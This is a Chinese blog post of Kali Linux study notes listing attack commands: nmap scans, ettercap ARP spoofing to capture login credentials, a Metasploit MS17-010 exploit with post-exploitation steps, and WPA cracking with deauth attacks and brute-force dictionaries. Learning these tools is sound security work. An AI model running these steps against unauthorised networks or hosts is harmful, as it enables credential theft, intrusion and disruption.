网络安全笔记(kali)

最新推荐文章于 2024-05-01 18:35:25 发布
最新推荐文章于 2024-05-01 18:35:25 发布
阅读量861 收藏 7
点赞数 1
分类专栏: 笔记 文章标签: kali
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/imdyf/article/details/80549482
版权

NMAP扫描

中文文档:http://www.nmap.com.cn/doc/manual.shtm

nmap # 帮助 -h可省略
nmap 192.168.1.1 # 最简单的命令
nmap -v 192.168.1.1 # 提高输出信息的详细度
nmap -vv 192.168.1.1 # 更详细
nmap -A 192.168.1.1 # 启用了操作系统检测(-O)和版本扫描(-sV),以后会增加更多的功能
nmap -p 1-1024 192.168.1.1 # 只扫描1-1024端口
nmap -p 1-1024 -A 192.168.209.0/24 # 扫描192.168.209.0/24网段主机的1-1024端口,同时启用系统检测和版本扫描

ARP欺骗获取账号密码(ARP欺骗和MITM攻击)

ettercap -G # 启用ettercap的GUI
  • Sniff - Unified sniffing - 选择网卡(一般eth0) - 确定
  • Hosts - Host List - 选择两个目标(一般是目标主机和网关)并添加到Target 1/2
  • Mitm - Arp poisoning - 勾选Sniff remote connections - OK
  • HTTP账号密码会自动抓取并显示
  • View - Connections
# 其它工具和命令
arpspoof

MSF入侵主机

msfupdate # 更新msf
msfconsole # 启动msf
help # 帮助
search ms17-010 # 查找ms17-010相关的模块
use exploit/windows/smb/ms17_010_psexec # 使用模块 exploit/windows/smb/ms17_010_psexec
show options # 显示选项
set RHOST 192.168.209.129 # 设置RHOST的值为192.168.209.129
exploit # 发起攻击

其它资料:https://blog.csdn.net/qq_29701419/article/details/48975769

# msf载荷,可选
show payloads # 显示载荷
set payload windows/shell/bind_tcp # 使用载荷 windows/shell/bind_tcp
# 入侵成功后的命令
help # 帮助
sysinfo # 系统信息
screenshot # 截屏
shell # 进入系统命令行

Aircrack-ng破解WiFi密码(WPA/WPA2)

ifconfig # 查看无线网卡名称,这里假设我的是wlan0
airmon-ng start wlan0 # 将wlan0改成monitor模式。关于无线网卡的模式,请另行百度。
airodump-ng wlan0 # 启动抓包工具airodump-ng,选择无线网卡wlan0
# 然后选择你要破解的WiFiBSSID,记下它的信道(channel),这里假设我的目标的BSSIDAA:AA:AA:AA:AA:AA,信道是1。抓包保存的文件名为test。
# airodump-ng -c [the BSSID's chanel] -w [output capfile's name] --bssid [BSSID] [interface]
airodump-ng -c 1 -w test --bssid AA:AA:AA:AA:AA:AA wlan0
# 接下来等待握手包。当有客户端连接WiFi时就会产生握手包。我们可以慢慢等待,或者用deauth攻击让客户端掉线重连。
# 我们可以选择一个客户端,记下他的MAC地址,然后新开一个终端,进行deauth攻击。这里假设它的MAC地址是BB:BB:BB:BB:BB:BB。我们发10个deauth包。
# aireplay-ng -0 [number] -a [BSSID] -c [user's MAC] [interface]
aireplay-ng -0 10 -a AA:AA:AA:AA:AA:AA -c BB:BB:BB:BB:BB:BB wlan0
# 然后用户就会掉线,我们等它自动重连,然后我们就会得到握手包。airodump-ng界面会显示“WPA handshake”。
# 然后我们用字典进行破解。这里假设字典为dict.txt
# aircrack-ng -w [dictionary's name] [capfile's name(for example:aaa-01.cap)]
aircrack-ng -w dict.txt test.cap
# 然后就等密码出来了。当然,如果密码不在字典里面,是跑不出来的。

# PS:我们可以用crunch来生成字典。这里生成一个0-9组成的8位数字典(即00000000-99999999),输出dict.txtcrunch 8 8 0123456789 -o dict.txt
# 如果WiFi密码是八位数,用这个字典就能跑出来了。
# 从攻击过程我们可以知道,相对于密码复杂度,密码长度更重要。如果只是纯数字的密码,每增加一位,平均破解时间增加十倍。不过如果是手机号做密码,那就另当别论,手机号虽然是13位,但数量并不是10^13那么多。
叶梓翎
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
KALI linux学习记录笔记
05-13
KALI linux学习记录笔记 linux入门的笔记,包括常用命令!
网络安全入门课 kali
u011893782的博客
03-27 838
kali是一个渗透用的工具操作系统。网上的资源很多,最近听了一门,简单做了一些笔记。 这门课主要是kali的入门课,包含kali简介安装、kali完成主机和端口扫描、wireshark工具的使用。 一、kali的官网 www.kali.org,国内就可以访问,网站有点慢。这块也讲了一些查询国外的技巧。 二、关于端口扫描技术,netdiscover可以利用ARP扫描技术,并通过mac信息,获取...
2024年网络安全最全2024最新版kali安装教程_kali下载(1)
最新发布
2401_84253850的博客
05-01 439
1、打开VMware, 点击 “创建新的虚拟机”2、选择 “自定义”,点击 “下一步”3、默认即可、点击 “下一步”4、选择 “稍后安装操作系统” ,点击 “下一步”5、操作系统选择 “Linux” ,版本选择 “Debian 64位” ,至于选择64位还是32位需要根据镜像选择对应的版本,当然也可以直接选择64位,毕竟可以向下兼容。点击 “下一步”6、 “虚拟机名称” 随便设置,根据自己喜好来,可以有中文;
Kali的学习笔记
wnma3mz的博客
06-30 535
# 局域网内断网 # arpspoof -i 网卡 -t 目标ip 网关 #网关:192.168.x.1 >>>arpspoof -i eth0 -t 192.168.2.176 192.168.2.1 # 也可以使用ping命令,不过效果不如上面的命令。Windows下此命令无法生效,因为限制了发送数据时间的大小 >>>ping 192.168.2.176 ...
kali Linux笔记
世界那么大,我要学编程看看!
06-02 1071
kali linux安全渗透技术简介
学习Kali笔记
m0_62584974的博客
04-15 1603
2022/4/15 查看当前使用的Shell类型: /usr/bin/zsh #可以看到我们使用是zsh类型的shell。centos7 使用的是bash类型的shell。 zsh功能更强,而且zsh完全兼容bash的用法和命令。 配置apt命令在线安装包的源为国内源 命令:# vim /etc/apt/sources.list 配置apt国内源 因为Kali自带的源是国外的,经常会因为网络问题,而无法安装或更新软件包。而且国外的源速度很慢。所以我们直接使用国内的源,方便快速。 .
安全课堂kali linux笔记1~100课.zip
07-27
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的...
kali Linux渗透技术详解笔记
07-27
kali Linux环境部署,Linux相关命令,枚举工具,简单网络管理协议,邮件传输协议。
kali-wireshark抓取客户端访问ftp的用户名和密码-运维安全详细笔记
06-30
kali-wireshark 抓取客户端访问 ftp 的用户名和密码-运维安全详细笔记 本文将详细介绍如何使用 kali-wireshark 抓取客户端访问 ftp 的用户名和密码,旨在帮助读者了解 wireshark 的基本使用和 ftp 协议的工作原理。...
B站kali前5章笔记.zip
03-14
《B站Kali Linux前五章笔记》是一个深入学习网络安全工具Kali Linux的资源集合,主要涵盖了初学者在入门阶段需要掌握的基础知识和关键技能。Kali Linux是一款基于Debian的开源操作系统,专为网络安全专业人士设计,...
无线网络安全破解与防御
10-14
无线网络安全破解与防御,无线网络安全,无线网络攻击
kali学习手册
12-10
Security Testing, Penetration Testing, and Ethical Hacking
Kali Linux安全测试(安全牛收费版)课件
04-05
安全牛中价值599元课程的课件,可以让你通过看课件快速的掌握。
kali 玩耍笔记
plokday的博客
03-07 4171
1. 物理机装kali linux rolling 1.大部分参考网上帖子,但是写入磁盘镜像工具要用win32diskimage,用别的无法安装成功,什么反复插拔usb……简直是毁电脑,至少我的没卵用,可能这个版本不适用,技术文章都有一定时效性,搜的时候最好过滤为一年以内。 2.用完win32diskimage后u盘的恢复,找个分区软件重新分区就好。 二、kali安装vmware14 ...
网络安全利器---------kalikali的安装
一枚不知名的Java程序猿
08-02 2695
kali安装
网络安全kali渗透学习 web渗透入门kali系统的安装和使用。
xueshenlaila的博客
01-14 4593
kali最新系统安装,最新的系统界面和主题迎来了很大的改善,给用户带来了视觉上的焕然一新,其中,这一次更新也打破了以往默认用户为root的方式; 底部有已经安装好的,下载之后,请到我主页找到修改密码的文章 希望这篇文章能够帮助所有刚刚入门准备学网安的人们能够成功安装kali系统 以下有视频版还有文字版 不知道怎么下载kali系统的请看文字版的,里面含有下载好的kali系统 关注公众号侠盗男爵回复【kali系统】 视频版↓: 网络安全/黑客防御/kali渗透测试/wbe安全-小白入门到精通 全套10000集大
网络安全kali渗透学习 web渗透入门 DDOS的原理和防护
xueshenlaila的博客
02-15 2327
DDOS分布式拒绝服务攻击(英文意思是Distributed Denial of Service,简称DDoS)是指处于不同位置的多个攻击者同时向一个或数个目标发动攻击,或者一个攻击者控制了位于不同位置的多台机器并利用这些机器对受害者同时实施攻击。由于攻击的发出点是分布在不同地方的,这类攻击称为分布式拒绝服务攻击,其中的攻击者可以有多个。 这篇文章教大家DDOS的原理和防护 以下有视频版还有文字版 不知道怎么操作的请看文字版的,里面详细的步骤。 关注公众号侠盗男爵回复【kali系统】 视频版↓: 网络安全/
网络安全:如何使用Kali Linux进行内网或局域网安全演练?
Y525698136的博客
06-06 306
如何使用ARP欺骗窃取局域网用户相关账户密玛
Kali Linux 网络渗透测试实践指南:网络安全渗透测试的执行标准
m0_71745754的博客
01-10 962
如图片过大被平台压缩导致看不清的话,点击**CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享**视频配套资料&国内外网安书籍、文档&工具当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。​​一些我自己买的、其他平台白嫖不到的视频教程:需要的话可以点击**CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享**网络安全产业就像一个江湖,各色人等聚集。
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
Kali Linux是一款专门用于渗透测试和网络安全评估的Linux发行版,其中集成了大量的安全工具和资源。其中,sqlmap是一款功能强大的自动化SQL注入和数据库渗透测试工具,可以帮助我们快速发现和利用SQL注入漏洞。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值